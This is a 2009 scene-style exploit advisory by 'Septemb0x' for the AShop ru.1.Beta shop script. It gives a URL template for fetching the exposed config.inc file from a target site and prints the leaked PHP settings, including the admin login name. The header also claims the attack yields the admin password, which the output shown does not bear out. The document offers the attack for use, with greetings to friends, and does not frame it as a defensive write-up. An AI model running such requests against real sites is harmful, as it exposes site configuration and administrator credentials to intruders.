ashop-disclose.txt
Posted on 22 July 2009
< ------------------- header data start ------------------- > ############################################################# # Application Name : AShop ru.1.Beta # Vulnerable Type : Arbitrary Database Config Disclosure Vulnerability # Infection : Admin Login Password Get... # Author : Septemb0x # Script Down.& WebSite : http://s2.dosya.tc/AShop.rar.html - http://softsearch.ru/programs/30-132-ashop-ru-download.shtml ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > EXPLOIT : http://[target]/[path]/config.inc GET TO; <? define('A_LOGIN', 'admin'); define('A_TITLE', ''); define('A_CACHE_TIME', '21600'); define('A_ADV', 'TRUE'); define('A_ADV_HTTP', 'TRUE'); ?> < -- bug code end of -- > # Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends... _________________________________________________________________ http://www.microsoft.com/turkiye/windows/windowslive/products/social-network-connector.aspx
